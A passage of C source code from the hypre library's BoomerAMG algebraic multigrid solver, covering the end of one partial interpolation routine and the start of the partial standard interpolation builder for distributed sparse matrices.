/*--------------------------------------------------------------------
* If i is an F-point, build interpolation.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
strong_f_marker--;
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
/*--------------------------------------------------------------
* If neighbor i1 is a C-point, set column number in P_diag_j
* and initialize interpolation weight to zero.
*--------------------------------------------------------------*/
if (CF_marker[i1] >= 0)
{
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[i1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
P_marker[i1] = strong_f_marker;
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] >= 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[k1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] >= 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
P_marker_offd[k1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = k1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
if ( num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if ( CF_marker_offd[i1] >= 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
P_marker_offd[i1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = i1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
P_marker_offd[i1] = strong_f_marker;
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
/* Find local col number */
if (big_k1 >= col_1 && big_k1 < col_n)
{
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[loc_col];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
P_offd_j[jj_counter_offd] = loc_col;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
jj_end_row = jj_counter;
jj_end_row_offd = jj_counter_offd;
diagonal = A_diag_data[A_diag_i[i]];
for (jj = A_diag_i[i] + 1; jj < A_diag_i[i + 1]; jj++)
{
/* i1 is a c-point and strongly influences i, accumulate
* a_(i,i1) into interpolation weight */
i1 = A_diag_j[jj];
if (P_marker[i1] >= jj_begin_row)
{
P_diag_data[P_marker[i1]] += A_diag_data[jj];
}
else if (P_marker[i1] == strong_f_marker)
{
sum = zero;
sgn = 1;
if (A_diag_data[A_diag_i[i1]] < 0) { sgn = -1; }
/* Loop over row of A for point i1 and calculate the sum
* of the connections to c-points that strongly incluence i. */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if ((P_marker[i2] >= jj_begin_row || i2 == i) && (sgn * A_diag_data[jj1]) < 0)
{
sum += A_diag_data[jj1];
}
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
{
sum += A_offd_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_diag_data[jj] / sum;
/* Loop over row of A for point i1 and do the distribution */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if (P_marker[i2] >= jj_begin_row && (sgn * A_diag_data[jj1]) < 0)
P_diag_data[P_marker[i2]] +=
distribute * A_diag_data[jj1];
if (i2 == i && (sgn * A_diag_data[jj1]) < 0)
{
diagonal += distribute * A_diag_data[jj1];
}
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
P_offd_data[P_marker_offd[i2]] +=
distribute * A_offd_data[jj1];
}
}
}
else
{
diagonal += A_diag_data[jj];
}
}
/* neighbor i1 weakly influences i, accumulate a_(i,i1) into
* diagonal */
else if (CF_marker[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func[i1])
{
diagonal += A_diag_data[jj];
}
}
}
if (num_procs > 1)
{
for (jj = A_offd_i[i]; jj < A_offd_i[i + 1]; jj++)
{
i1 = A_offd_j[jj];
if (P_marker_offd[i1] >= jj_begin_row_offd)
{
P_offd_data[P_marker_offd[i1]] += A_offd_data[jj];
}
else if (P_marker_offd[i1] == strong_f_marker)
{
sum = zero;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row || loc_col == i)
{
sum += A_ext_data[jj1];
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd)
{
sum += A_ext_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_offd_data[jj] / sum;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row)
P_diag_data[P_marker[loc_col]] += distribute *
A_ext_data[jj1];
if (loc_col == i)
{
diagonal += distribute * A_ext_data[jj1];
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd)
P_offd_data[P_marker_offd[loc_col]] += distribute *
A_ext_data[jj1];
}
}
}
else
{
diagonal += A_offd_data[jj];
}
}
else if (CF_marker_offd[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func_offd[i1])
{
diagonal += A_offd_data[jj];
}
}
}
}
if (diagonal)
{
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
P_diag_data[jj] /= -diagonal;
}
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
P_offd_data[jj] /= -diagonal;
}
}
}
strong_f_marker--;
}
hypre_TFree(P_marker, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker_offd, HYPRE_MEMORY_HOST);
} /* end parallel region */
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d fill structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
P = hypre_ParCSRMatrixCreate(comm,
total_old_global_cpts,
total_global_cpts,
num_old_cpts_global,
num_cpts_global,
0,
P_diag_i[n_coarse_old],
P_offd_i[n_coarse_old]);
P_diag = hypre_ParCSRMatrixDiag(P);
hypre_CSRMatrixData(P_diag) = P_diag_data;
hypre_CSRMatrixI(P_diag) = P_diag_i;
hypre_CSRMatrixJ(P_diag) = P_diag_j;
P_offd = hypre_ParCSRMatrixOffd(P);
hypre_CSRMatrixData(P_offd) = P_offd_data;
hypre_CSRMatrixI(P_offd) = P_offd_i;
hypre_CSRMatrixJ(P_offd) = P_offd_j;
hypre_CSRMatrixMemoryLocation(P_diag) = HYPRE_MEMORY_HOST;
hypre_CSRMatrixMemoryLocation(P_offd) = HYPRE_MEMORY_HOST;
/* Compress P, removing coefficients smaller than trunc_factor * Max */
if (trunc_factor != 0.0 || max_elmts > 0)
{
hypre_BoomerAMGInterpTruncation(P, trunc_factor, max_elmts);
P_diag_data = hypre_CSRMatrixData(P_diag);
P_diag_i = hypre_CSRMatrixI(P_diag);
P_diag_j = hypre_CSRMatrixJ(P_diag);
P_offd_data = hypre_CSRMatrixData(P_offd);
P_offd_i = hypre_CSRMatrixI(P_offd);
P_offd_j = hypre_CSRMatrixJ(P_offd);
P_diag_size = P_diag_i[n_coarse_old];
P_offd_size = P_offd_i[n_coarse_old];
}
/* This builds col_map, col_map should be monotone increasing and contain
* global numbers. */
if (P_offd_size)
{
hypre_build_interp_colmap(P, full_off_procNodes, tmp_CF_marker_offd, fine_to_coarse_offd);
}
hypre_MatvecCommPkgCreate(P);
for (i = 0; i < n_fine; i++)
if (CF_marker[i] < -1) { CF_marker[i] = -1; }
*P_ptr = P;
/* Deallocate memory */
hypre_TFree(fine_to_coarse, HYPRE_MEMORY_HOST);
hypre_TFree(old_coarse_to_fine, HYPRE_MEMORY_HOST);
hypre_TFree(P_diag_array, HYPRE_MEMORY_HOST);
hypre_TFree(P_offd_array, HYPRE_MEMORY_HOST);
if (num_procs > 1)
{
hypre_CSRMatrixDestroy(Sop);
hypre_CSRMatrixDestroy(A_ext);
hypre_TFree(fine_to_coarse_offd, HYPRE_MEMORY_HOST);
hypre_TFree(CF_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(tmp_CF_marker_offd, HYPRE_MEMORY_HOST);
if (num_functions > 1)
{
hypre_TFree(dof_func_offd, HYPRE_MEMORY_HOST);
}
hypre_MatvecCommPkgDestroy(extend_comm_pkg);
}
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PARTIAL_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
/*---------------------------------------------------------------------------
* hypre_BoomerAMGBuildPartialStdInterp
* Comment: The interpolatory weighting can be changed with the sep_weight
* variable. This can enable not separating negative and positive
* off diagonals in the weight formula.
*--------------------------------------------------------------------------*/
HYPRE_Int
hypre_BoomerAMGBuildPartialStdInterp(hypre_ParCSRMatrix *A, HYPRE_Int *CF_marker,
hypre_ParCSRMatrix *S, HYPRE_BigInt *num_cpts_global,
HYPRE_BigInt *num_old_cpts_global,
HYPRE_Int num_functions, HYPRE_Int *dof_func, HYPRE_Int debug_flag,
HYPRE_Real trunc_factor, HYPRE_Int max_elmts,
HYPRE_Int sep_weight,
hypre_ParCSRMatrix **P_ptr)
{
/* Communication Variables */
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
HYPRE_Int my_id, num_procs;
/* Variables to store input variables */
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
/*HYPRE_Int num_cols_A_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Int *col_map_offd = hypre_ParCSRMatrixColMapOffd(A);*/
HYPRE_Int n_fine = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_1 = hypre_ParCSRMatrixFirstRowIndex(A);
HYPRE_Int local_numrows = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_n = col_1 + (HYPRE_BigInt)local_numrows;
HYPRE_BigInt total_global_cpts, my_first_cpt;
/* Variables to store strong connection matrix info */
hypre_CSRMatrix *S_diag = hypre_ParCSRMatrixDiag(S);
HYPRE_Int *S_diag_i = hypre_CSRMatrixI(S_diag);
HYPRE_Int *S_diag_j = hypre_CSRMatrixJ(S_diag);
hypre_CSRMatrix *S_offd = hypre_ParCSRMatrixOffd(S);
HYPRE_Int *S_offd_i = hypre_CSRMatrixI(S_offd);
HYPRE_Int *S_offd_j = hypre_CSRMatrixJ(S_offd);
/* Interpolation matrix P */
hypre_ParCSRMatrix *P;
hypre_CSRMatrix *P_diag;
hypre_CSRMatrix *P_offd;
HYPRE_Real *P_diag_data = NULL;
HYPRE_Int *P_diag_i, *P_diag_j = NULL;
HYPRE_Real *P_offd_data = NULL;
HYPRE_Int *P_offd_i, *P_offd_j = NULL;
/*HYPRE_Int *col_map_offd_P = NULL;*/
HYPRE_Int P_diag_size;
HYPRE_Int P_offd_size;
HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;
HYPRE_Int *CF_marker_offd = NULL;
HYPRE_Int *tmp_CF_marker_offd = NULL;
HYPRE_Int *dof_func_offd = NULL;
/* Full row information for columns of A that are off diag*/
hypre_CSRMatrix *A_ext;
HYPRE_Real *A_ext_data;
HYPRE_Int *A_ext_i;
HYPRE_BigInt *A_ext_j;
HYPRE_Int *fine_to_coarse = NULL;
HYPRE_BigInt *fine_to_coarse_offd = NULL;
HYPRE_Int *old_coarse_to_fine = NULL;
HYPRE_Int loc_col;
HYPRE_Int full_off_procNodes;
hypre_CSRMatrix *Sop;
HYPRE_Int *Sop_i;
HYPRE_BigInt *Sop_j;
/* Variables to keep count of interpolatory points */
HYPRE_Int jj_counter, jj_counter_offd;
HYPRE_Int jj_begin_row, jj_end_row;
HYPRE_Int jj_begin_row_offd = 0;
HYPRE_Int jj_end_row_offd = 0;
HYPRE_Int coarse_counter;
HYPRE_Int n_coarse_old;
HYPRE_BigInt total_old_global_cpts;
HYPRE_Int *ihat = NULL;
HYPRE_Int *ihat_offd = NULL;
HYPRE_Int *ipnt = NULL;
HYPRE_Int *ipnt_offd = NULL;
HYPRE_Int strong_f_marker = -2;
/* Interpolation weight variables */
HYPRE_Real *ahat = NULL;
HYPRE_Real *ahat_offd = NULL;
HYPRE_Real sum_pos, sum_pos_C, sum_neg, sum_neg_C, sum, sum_C;
HYPRE_Real diagonal, distribute;
HYPRE_Real alfa, beta;
/* Loop variables */
/*HYPRE_Int index;*/
HYPRE_Int cnt, old_cnt;
HYPRE_Int start_indexing = 0;
HYPRE_Int i, ii, i1, j1, jj, kk, k1;
HYPRE_BigInt big_k1;
HYPRE_Int cnt_c, cnt_f, cnt_c_offd, cnt_f_offd, indx;
/* Definitions */
HYPRE_Real zero = 0.0;
HYPRE_Real one = 1.0;
HYPRE_Real wall_time;
HYPRE_Real wall_1 = 0;
HYPRE_Real wall_2 = 0;
HYPRE_Real wall_3 = 0;
hypre_ParCSRCommPkg *extend_comm_pkg = NULL;
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
/* BEGIN */
hypre_MPI_Comm_size(comm, &num_procs);
hypre_MPI_Comm_rank(comm, &my_id);
my_first_cpt = num_cpts_global[0];
/*my_first_old_cpt = num_old_cpts_global[0];*/
n_coarse_old = (HYPRE_Int)(num_old_cpts_global[1] - num_old_cpts_global[0]);
/*n_coarse = num_cpts_global[1] - num_cpts_global[0];*/
if (my_id == (num_procs - 1))
{
total_global_cpts = num_cpts_global[1];
total_old_global_cpts = num_old_cpts_global[1];
}
hypre_MPI_Bcast(&total_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
hypre_MPI_Bcast(&total_old_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
if (!comm_pkg)
{
hypre_MatvecCommPkgCreate(A);
comm_pkg = hypre_ParCSRMatrixCommPkg(A);
}
/* Set up off processor information (specifically for neighbors of
* neighbors */
full_off_procNodes = 0;
if (num_procs > 1)
{
if (hypre_exchange_interp_data(
&CF_marker_offd, &dof_func_offd, &A_ext, &full_off_procNodes, &Sop, &extend_comm_pkg,
A, CF_marker, S, num_functions, dof_func, 0))
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_EXTENDED_I_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
A_ext_i = hypre_CSRMatrixI(A_ext);
A_ext_j = hypre_CSRMatrixBigJ(A_ext);
A_ext_data = hypre_CSRMatrixData(A_ext);
Sop_i = hypre_CSRMatrixI(Sop);
Sop_j = hypre_CSRMatrixBigJ(Sop);
}
/*-----------------------------------------------------------------------
* First Pass: Determine size of P and fill in fine_to_coarse mapping.
*-----------------------------------------------------------------------*/
/*-----------------------------------------------------------------------
* Intialize counters and allocate mapping vector.
*-----------------------------------------------------------------------*/
P_diag_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
P_offd_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
if (n_fine)
{
old_coarse_to_fine = hypre_CTAlloc(HYPRE_Int, n_coarse_old, HYPRE_MEMORY_HOST);
fine_to_coarse = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
P_marker = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
}
if (full_off_procNodes)
{
P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
fine_to_coarse_offd = hypre_CTAlloc(HYPRE_BigInt, full_off_procNodes, HYPRE_MEMORY_HOST);
tmp_CF_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
hypre_initialize_vecs(n_fine, full_off_procNodes, fine_to_coarse,
fine_to_coarse_offd, P_marker, P_marker_offd,
tmp_CF_marker_offd);
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
coarse_counter = 0;
cnt = 0;
old_cnt = 0;
for (i = 0; i < n_fine; i++)
{
fine_to_coarse[i] = -1;
if (CF_marker[i] == 1)
{
fine_to_coarse[i] = cnt++;
old_coarse_to_fine[old_cnt++] = i;
}
else if (CF_marker[i] == -2)
{
old_coarse_to_fine[old_cnt++] = i;
}
}
/*-----------------------------------------------------------------------
* Loop over fine grid.
*-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
P_diag_i[ii] = jj_counter;
if (num_procs > 1)
{
P_offd_i[ii] = jj_counter_offd;
}
i = old_coarse_to_fine[ii];
if (CF_marker[i] > 0)
{
jj_counter++;
coarse_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, interpolation is from the C-points that
* strongly influence i, or C-points that stronly influence F-points
* that strongly influence i.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
if (CF_marker[i1] > 0)
{
/* i1 is a C point */
if (P_marker[i1] < P_diag_i[ii])
{
P_marker[i1] = jj_counter;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
/* i1 is a F point, loop through it's strong neighbors */
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < P_diag_i[ii])
{
P_marker[k1] = jj_counter;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < P_offd_i[ii])
{
tmp_CF_marker_offd[k1] = 1;
P_marker_offd[k1] = jj_counter_offd;
jj_counter_offd++;
}
}
}
}
}
}
/* Look at off diag strong connections of i */
if (num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if (CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < P_offd_i[ii])
{
tmp_CF_marker_offd[i1] = 1;
P_marker_offd[i1] = jj_counter_offd;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
/* F point; look at neighbors of i1. Sop contains global col
* numbers and entries that could be in S_diag or S_offd or
* neither. */
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* In S_diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (CF_marker[loc_col] >= 0)
{
if (P_marker[loc_col] < P_diag_i[ii])
{
P_marker[loc_col] = jj_counter;
jj_counter++;
}
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (CF_marker_offd[loc_col] >= 0)
{
if (P_marker_offd[loc_col] < P_offd_i[ii])
{
P_marker_offd[loc_col] = jj_counter_offd;
tmp_CF_marker_offd[loc_col] = 1;
jj_counter_offd++;
}
}
}
}
}
}
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d determine structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
P_diag_size = jj_counter;
P_offd_size = jj_counter_offd;
if (P_diag_size)
{
P_diag_j = hypre_CTAlloc(HYPRE_Int, P_diag_size, HYPRE_MEMORY_HOST);
P_diag_data = hypre_CTAlloc(HYPRE_Real, P_diag_size, HYPRE_MEMORY_HOST);
}
if (P_offd_size)
{
P_offd_j = hypre_CTAlloc(HYPRE_Int, P_offd_size, HYPRE_MEMORY_HOST);
P_offd_data = hypre_CTAlloc(HYPRE_Real, P_offd_size, HYPRE_MEMORY_HOST);
}
P_diag_i[n_coarse_old] = jj_counter;
P_offd_i[n_coarse_old] = jj_counter_offd;
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
/* Fine to coarse mapping */
if (num_procs > 1)
{
hypre_big_insert_new_nodes(comm_pkg, extend_comm_pkg, fine_to_coarse,
full_off_procNodes, my_first_cpt,
fine_to_coarse_offd);
}
/* Initialize ahat, which is a modification to a, used in the standard
* interpolation routine. */
if (n_fine)
{
ahat = hypre_CTAlloc(HYPRE_Real, n_fine, HYPRE_MEMORY_HOST);
ihat = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
ipnt = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
}
if (full_off_procNodes)
{
ahat_offd = hypre_CTAlloc(HYPRE_Real, full_off_procNodes, HYPRE_MEMORY_HOST);
ihat_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
ipnt_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
for (i = 0; i < n_fine; i++)
{
P_marker[i] = -1;
ahat[i] = 0;
ihat[i] = -1;
}
for (i = 0; i < full_off_procNodes; i++)
{
P_marker_offd[i] = -1;
ahat_offd[i] = 0;
ihat_offd[i] = -1;
}
/*-----------------------------------------------------------------------
* Loop over fine grid points.
*-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
i = old_coarse_to_fine[ii];
/*--------------------------------------------------------------------
* If i is a c-point, interpolation is the identity.
*--------------------------------------------------------------------*/
if (CF_marker[i] > 0)
{
P_diag_j[jj_counter] = fine_to_coarse[i];
P_diag_data[jj_counter] = one;
jj_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, build interpolation.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
strong_f_marker--;
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
/*--------------------------------------------------------------
* If neighbor i1 is a C-point, set column number in P_diag_j
* and initialize interpolation weight to zero.
*--------------------------------------------------------------*/
if (CF_marker[i1] > 0)
{
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
P_diag_j[jj_counter] = i1;
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
P_marker[i1] = strong_f_marker;
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
P_diag_j[jj_counter] = k1;
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
P_marker_offd[k1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = k1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
if ( num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if ( CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
P_marker_offd[i1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = i1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
P_marker_offd[i1] = strong_f_marker;
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (CF_marker[loc_col] > 0)
{
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
P_diag_j[jj_counter] = loc_col;
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (CF_marker_offd[loc_col] > 0)
{
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
P_offd_j[jj_counter_offd] = loc_col;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
}
jj_end_row = jj_counter;
jj_end_row_offd = jj_counter_offd;
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
wall_1 += wall_time;
fflush(NULL);
}
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
cnt_c = 0;
cnt_f = jj_end_row - jj_begin_row;
cnt_c_offd = 0;
cnt_f_offd = jj_end_row_offd - jj_begin_row_offd;
ihat[i] = cnt_f;
ipnt[cnt_f] = i;
ahat[cnt_f++] = A_diag_data[A_diag_i[i]];
for (jj = A_diag_i[i] + 1; jj < A_diag_i[i + 1]; jj++)
{
/* i1 is direct neighbor */
i1 = A_diag_j[jj];
if (P_marker[i1] != strong_f_marker)
{
indx = ihat[i1];
if (indx > -1)
{
ahat[indx] += A_diag_data[jj];
}
else if (P_marker[i1] >= jj_begin_row)
{
ihat[i1] = cnt_c;
ipnt[cnt_c] = i1;
ahat[cnt_c++] += A_diag_data[jj];
}
else if (CF_marker[i1] != -3)
{
ihat[i1] = cnt_f;
ipnt[cnt_f] = i1;
ahat[cnt_f++] += A_diag_data[jj];
}
}
else
{
if (num_functions == 1 || dof_func[i] == dof_func[i1])
{
distribute = A_diag_data[jj] / A_diag_data[A_diag_i[i1]];
for (kk = A_diag_i[i1] + 1; kk < A_diag_i[i1 + 1]; kk++)
{
k1 = A_diag_j[kk];
indx = ihat[k1];
if (indx > -1)
{
ahat[indx] -= A_diag_data[kk] * distribute;
}
else if (P_marker[k1] >= jj_begin_row)
{
ihat[k1] = cnt_c;
ipnt[cnt_c] = k1;
ahat[cnt_c++] -= A_diag_data[kk] * distribute;
}
else
{
ihat[k1] = cnt_f;
ipnt[cnt_f] = k1;
ahat[cnt_f++] -= A_diag_data[kk] * distribute;
}
}
if (num_procs > 1)
{
for (kk = A_offd_i[i1]; kk < A_offd_i[i1 + 1]; kk++)
{
k1 = A_offd_j[kk];
indx = ihat_offd[k1];
if (num_functions == 1 || dof_func[i1] == dof_func_offd[k1])
{
if (indx > -1)
{
ahat_offd[indx] -= A_offd_data[kk] * distribute;
}
else if (P_marker_offd[k1] >= jj_begin_row_offd)
{
ihat_offd[k1] = cnt_c_offd;
ipnt_offd[cnt_c_offd] = k1;
ahat_offd[cnt_c_offd++] -= A_offd_data[kk] * distribute;
}
else
{
ihat_offd[k1] = cnt_f_offd;
ipnt_offd[cnt_f_offd] = k1;
ahat_offd[cnt_f_offd++] -= A_offd_data[kk] * distribute;
}
}
}
}
}
}
}
if (num_procs > 1)
{
for (jj = A_offd_i[i]; jj < A_offd_i[i + 1]; jj++)
{
i1 = A_offd_j[jj];
if (P_marker_offd[i1] != strong_f_marker)
{
indx = ihat_offd[i1];
if (indx > -1)
{
ahat_offd[indx] += A_offd_data[jj];
}
else if (P_marker_offd[i1] >= jj_begin_row_offd)
{
ihat_offd[i1] = cnt_c_offd;
ipnt_offd[cnt_c_offd] = i1;
ahat_offd[cnt_c_offd++] += A_offd_data[jj];
}
else if (CF_marker_offd[i1] != -3)
{
ihat_offd[i1] = cnt_f_offd;
ipnt_offd[cnt_f_offd] = i1;
ahat_offd[cnt_f_offd++] += A_offd_data[jj];
}
}
else
{
if (num_functions == 1 || dof_func[i] == dof_func_offd[i1])
{
distribute = A_offd_data[jj] / A_ext_data[A_ext_i[i1]];
for (kk = A_ext_i[i1] + 1; kk < A_ext_i[i1 + 1]; kk++)
{
big_k1 = A_ext_j[kk];
